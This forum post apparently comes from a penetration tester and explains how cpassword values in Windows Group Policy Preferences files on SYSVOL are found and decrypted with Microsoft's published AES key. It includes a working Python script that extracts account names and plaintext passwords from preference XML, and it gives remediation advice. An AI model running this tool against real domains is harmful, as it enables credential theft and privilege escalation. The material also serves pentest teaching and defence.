« on: May 20, 2015, 05:00:53 pm »
This tool decrypts the cpassword attribute value embedded in the Groups.xml file stored in the domain controller's SYSVOL share. Very briefly, we will be discussing how Group Policy Preferences can be used to create local users on machines, and just how quickly the embedded cpassword value can be recovered.

As far as I'm aware, by design Groups.xml will store the local administrator account username and password hash. However, after further research, and from the experiences of my colleagues, there are other similar .xml files which hold other account names and cpassword values for different purposes. For example, there are .xml files used for specific 'Services' that hold the account needed to run said service. Other .xml files include credentials and configuration settings for 'Printers' and 'Drives'. Further research suggests there are possible .xml files for 'ScheduledTasks' and 'DataSources', although I have yet to see these on any pentests I have performed.

Above is a Groups.xml file taken from a test lab I created some time ago. The important items within this file are:
- Group name
- Username
- Cpassword
The above information shows you the user and group used for the specific policy and, of course, the cpassword (often referred to as the cpass).

To find Groups.xml you will mainly have to search the SYSVOL folder of a domain controller. Preference files live under each policy's folder, i.e. \\<domain>\SYSVOL\<domain>\Policies\{GUID}\Machine\Preferences\Groups\Groups.xml (or the User\Preferences branch). You will very likely need domain credentials to access this share, but SYSVOL is readable by any authenticated domain user by default, so a single low-privilege account is enough. Simply browse to the server share and you should see the SYSVOL folder if it exists or is accessible with the credentials you have supplied. If using Windows you can simply 'search' for groups.xml; however, searching for *.xml will likely yield more results, since the other preference files mentioned above also carry cpassword attributes.

Now, as common as this method is for rolling out user credentials for specific services, Microsoft, for whatever reason, decided to publish the key used to encrypt this password in the MS-GPPREF specification:
http://msdn.microsoft.com/en-us/library/2c15cbf0-f086-4c74-8b70-1f2fa45dd4be.aspx

Now you may think, "Well, why is this any different to cracking any other password hash?" The difference is that the cpassword is not a hash at all: it is the password encrypted with AES-256 under that single, publicly documented key, so recovering the plaintext takes less than a second regardless of password complexity, and no password policy will help.

Usage for gpprefdecrypt.py is easy: simply call the script and give it the cpassword value.

References
gpprefdecrypt.py can be found on my pastebin, as mirrors to the script are often down.
There is a Ruby version of this script for use with the new Kali Linux distribution.
http://carnal0wnage.attackresearch.com/2012/10/group-policy-preferences-and-getting.html

So what can you do to protect yourself from this exploit? Simple: do not specify user credentials within Group Policy Preferences. Note that Microsoft's MS14-025 (May 2014) only removes the ability to save new passwords in Group Policy Preferences; existing cpassword values already in SYSVOL are left in place, so search for them and delete the affected preference items, then change the passwords they contained.

I would like to send out a thank you to the people below for making this post possible:
- My colleagues for their input into the Groups.xml exploit
- Loic Jaquemet for his work with gpprefdecrypt.py
- Microsoft for providing yet another quick and easy method of getting system on a pentest
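Putting the above together, the following is an added example written for this page; it is not the original gpprefdecrypt.py or the Ruby port. It implements the decryption the post describes (base64 with the trailing '=' padding restored, AES-256-CBC under the key published in MS-GPPREF with an all-zero IV, PKCS#7 unpadding, UTF-16LE decode) and walks a preference .xml file pulling out every non-empty cpassword together with the account it belongs to. The Groups.xml sample is constructed here and holds no real credentials; its cpassword is generated by the included encrypt helper so the script runs offline. The list of account-name attributes it checks (userName, username, accountName, runAs) is an assumption meant to cover Groups, Drives, Printers, DataSources, Services and ScheduledTasks files, and the code needs the `cryptography` package (or PyCryptodome as a fallback).

```python
"""Decrypt Group Policy Preferences cpassword values (added example)."""
import base64
import sys
import xml.etree.ElementTree as ET

# AES-256 key Microsoft published in MS-GPPREF; the IV is sixteen zero bytes.
GPP_KEY = bytes.fromhex(
    "4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b"
)
GPP_IV = bytes(16)

try:  # prefer the cryptography package, fall back to PyCryptodome
    from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes

    def _aes_cbc(data: bytes, decrypt: bool) -> bytes:
        cipher = Cipher(algorithms.AES(GPP_KEY), modes.CBC(GPP_IV))
        op = cipher.decryptor() if decrypt else cipher.encryptor()
        return op.update(data) + op.finalize()
except ImportError:
    from Crypto.Cipher import AES

    def _aes_cbc(data: bytes, decrypt: bool) -> bytes:
        aes = AES.new(GPP_KEY, AES.MODE_CBC, GPP_IV)
        return aes.decrypt(data) if decrypt else aes.encrypt(data)


def decrypt_cpassword(cpassword: str) -> str:
    """Return the plaintext for a cpassword attribute value."""
    # GPP writes the base64 without its trailing '=' padding; restore it.
    padded = cpassword + "=" * (-len(cpassword) % 4)
    plain = _aes_cbc(base64.b64decode(padded), decrypt=True)
    # Plaintext is UTF-16LE with PKCS#7 padding; reject garbage instead of
    # silently returning a mangled string.
    pad = plain[-1] if plain else 0
    if not 1 <= pad <= 16 or plain[-pad:] != bytes([pad]) * pad:
        raise ValueError("bad PKCS#7 padding: not a valid cpassword")
    return plain[:-pad].decode("utf-16-le")


def encrypt_cpassword(password: str) -> str:
    """Inverse of decrypt_cpassword, used here only to build sample data."""
    data = password.encode("utf-16-le")
    pad = 16 - len(data) % 16
    ciphertext = _aes_cbc(data + bytes([pad]) * pad, decrypt=False)
    return base64.b64encode(ciphertext).decode("ascii").rstrip("=")


# Attribute names that hold the account name next to a cpassword in the
# different preference files (Groups/Drives: userName, Printers/DataSources:
# username, Services: accountName, ScheduledTasks: runAs). This list is an
# assumption made for this example; verify it against the files you find.
ACCOUNT_ATTRS = ("userName", "username", "accountName", "runAs")


def extract_credentials(xml_text: str) -> list:
    """Return (tag, account name, plaintext) for every non-empty cpassword."""
    found = []
    for elem in ET.fromstring(xml_text).iter():
        cpass = elem.attrib.get("cpassword")
        if not cpass:  # attribute absent or empty: no password was set
            continue
        account = next((elem.attrib[a] for a in ACCOUNT_ATTRS if a in elem.attrib), None)
        found.append((elem.tag, account, decrypt_cpassword(cpass)))
    return found


# Constructed sample in the shape of a real Groups.xml (no real credentials);
# the cpassword is generated above so the example runs offline.
SAMPLE_PASSWORD = "Summer2015!"
SAMPLE_GROUPS_XML = f"""<Groups>
  <User name="Administrator (built-in)" image="2" changed="2015-05-20 17:00:53">
    <Properties action="U" newName="" fullName="" description=""
        cpassword="{encrypt_cpassword(SAMPLE_PASSWORD)}" changeLogon="0"
        noChange="1" neverExpires="1" acctDisabled="0"
        subAuthority="RID_ADMIN" userName="Administrator (built-in)"/>
  </User>
</Groups>"""

if __name__ == "__main__":
    if len(sys.argv) > 1:  # usage: python3 gpp_cpassword.py <cpassword> ...
        for value in sys.argv[1:]:
            print(decrypt_cpassword(value))
    else:
        for tag, account, password in extract_credentials(SAMPLE_GROUPS_XML):
            print(f"{tag}: {account!r} -> {password!r}")
```

Run it with no arguments to see it decrypt the constructed sample, or pass one or more cpassword values copied out of a real preference file. Because the key and IV are fixed, two accounts given the same password produce the identical cpassword string, which is a quick way to spot password reuse across policies before decrypting anything.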
« Last Edit: October 16, 2015, 01:11:26 am by iTpHo3NiX »
Penetration Tester
@leonteale